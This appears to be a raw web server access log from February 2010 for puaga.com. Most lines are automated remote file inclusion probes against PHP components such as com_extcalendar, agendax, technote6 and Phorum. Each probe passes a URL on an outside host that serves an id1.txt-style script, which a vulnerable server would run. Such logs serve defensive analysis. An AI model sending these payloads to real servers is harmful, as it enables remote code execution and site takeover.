69.64.70.246 - - [25/Feb/2010:09:11:53 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:11:53 -0800] "GET /logs//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:12:29 -0800] "GET /logs/access_100118.log//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:12:29 -0800] "GET /logs//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:12:29 -0800] "GET /errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:12:39 -0800] "GET /logs/access_100126.log//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:12:43 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:27 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:27 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:27 -0800] "GET /logs/access_100223.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:36 -0800] "GET /logs/access_100208.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:36 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:36 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:41 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:41 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:41 -0800] "GET /logs/access_100129.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:41 -0800] "GET /logs/access_100218.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:42 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:42 -0800] "GET /logs/access_100129.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:13:42 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:48 -0800] "GET /logs//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:48 -0800] "GET /logs/access_100118.log//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:48 -0800] "GET /errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:50 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:50 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:13:50 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:09:13:56 -0800] "GET /logs/access_100214.log//comment_modify.php?dir=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:14:02 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:14:30 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:14:30 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:14:30 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:14:39 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:14:39 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:15:09 -0800] "GET /logs/access_100218.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:15:26 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:15:26 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:15:26 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:15:43 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:15:43 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:15:59 -0800] "GET /logs/access_100126.log//errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:16:10 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:16:14 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:16:15 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:16:54 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:16:55 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:17:07 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:17:07 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:17:07 -0800] "GET /logs/access_100125.log//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:25 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:25 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:25 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:31 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:31 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:31 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:35 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:44 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:45 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:45 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:45 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:45 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:17:50 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:17:51 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:17:51 -0800] "GET /logs/access_100125.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:53 -0800] "GET /logs/access_100218.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:17:56 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:18:08 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:25 -0800] "GET /logs/access_100209.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:25 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:25 -0800] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:18:36 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:18:36 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:18:47 -0800] "GET /logs//errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:18:47 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:18:47 -0800] "GET /errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:48 -0800] "GET /logs/access_100121.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:18:52 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:18:52 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:18:52 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:58 -0800] "GET /logs/access_100209.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:59 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:18:59 -0800] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:10 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:11 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:12 -0800] "GET /logs/access_100202.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:19:15 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:19:15 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:19:17 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:19:17 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:19:17 -0800] "GET /logs/access_100125.log//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:19 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:21 -0800] "GET /logs/access_100202.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:19:22 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:24 -0800] "GET /logs/access_100202.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:19:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:19:34 -0800] "GET /logs/access_100217.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:20:01 -0800] "GET /logs/access_100120.log//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:09 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:09 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:09 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:09 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:18 -0800] "GET /logs/access_100118.log//errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:19 -0800] "GET /logs/access_100207.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:20:23 -0800] "GET /logs/access_100131.log//errors.php?error=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:20:36 -0800] "GET /logs/access_100209.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:20:40 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:20:43 -0800] "GET /components/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:20:43 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:09:20:43 -0800] "GET /logs//components/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:20:45 -0800] "GET /logs/access_100209.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:21:04 -0800] "GET /logs/access_100223.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:21:27 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:21:27 -0800] "GET /logs/access_100120.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:21:28 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:09:21:29 -0800] "GET /logs/access_100125.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.101.214.118 - - [25/Feb/2010:09:21:36 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
75.101.214.118 - - [25/Feb/2010:09:21:36 -0800] "GET /orange_g/forum/viewtopic.php?p=15223 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
200.93.147.154 - - [25/Feb/2010:09:22:14 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:22:19 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:22:19 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
